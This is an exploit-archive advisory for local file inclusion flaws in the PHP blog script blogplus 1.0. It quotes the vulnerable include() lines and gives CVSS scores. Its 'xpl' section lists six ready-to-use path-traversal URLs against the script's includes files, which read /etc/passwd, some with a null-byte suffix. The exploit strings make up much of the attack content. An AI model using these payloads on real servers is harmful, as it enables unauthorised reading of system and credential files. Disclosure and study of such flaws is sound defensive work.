blogplus 1.0 Multiple Local File Inclusion Vulnerabilities

2009.04.10
Credit: ahmadbady
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--:local file include:-- --------------------------------- script:blog+ v1.0 ---------------------------------------------- download from:http://www.ziddu.com/download/3151643/blogplus_v1.0_final.zip.html ---------------------------------------------- ............................................... vul:/includes/ block_center_down.php = $block_center_down_file = $row_mysql_blocks_center_down['file']; line 6 include ("blocks/".$block_center_down_file.""); line 7 block_center_top..php = $block_center_top_file = $row_mysql_blocks_center_top['file']; 6 include ("blocks/".$block_center_top_file.""); 7 ------------------------------------------- vul:/includes/ block_left.php = $block_left_file = $row_mysql_blocks_left['file']; line 8 include ("blocks/".$block_left_file.""); 9 block_right.php = $block_right_file = $row_mysql_blocks_right['file']; 6 include ("blocks/".$block_right_file.""); 7 line1; window_down.php = <?php include ("themes/".$row_mysql_bloginfo['theme']."/down.html"); ?> line1; window_top.php = <?php include ("themes/".$row_mysql_bloginfo['theme']."/top.html"); ?> ------------------------------------------- ------------------------------------------- xpl: /path/includes/block_center_down.php?row_mysql_blocks_center_down[file]=../../../../../../etc/passwd /path/includes/block_center_top.php?row_mysql_blocks_center_top[file]=../../../../../../etc/passwd /path/includes/block_left.php?row_mysql_blocks_left[file]=../../../../../../etc/passwd /path/includes/block_right.php?row_mysql_blocks_right[file]=../../../../../../etc/passwd /path/includes/window_down.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00 /path/includes/window_top.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00 *************************************************** *************************************************** --------------------------------------------------- Author: ahmadbady [kivi_hacker666@yahoo.com] ---------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top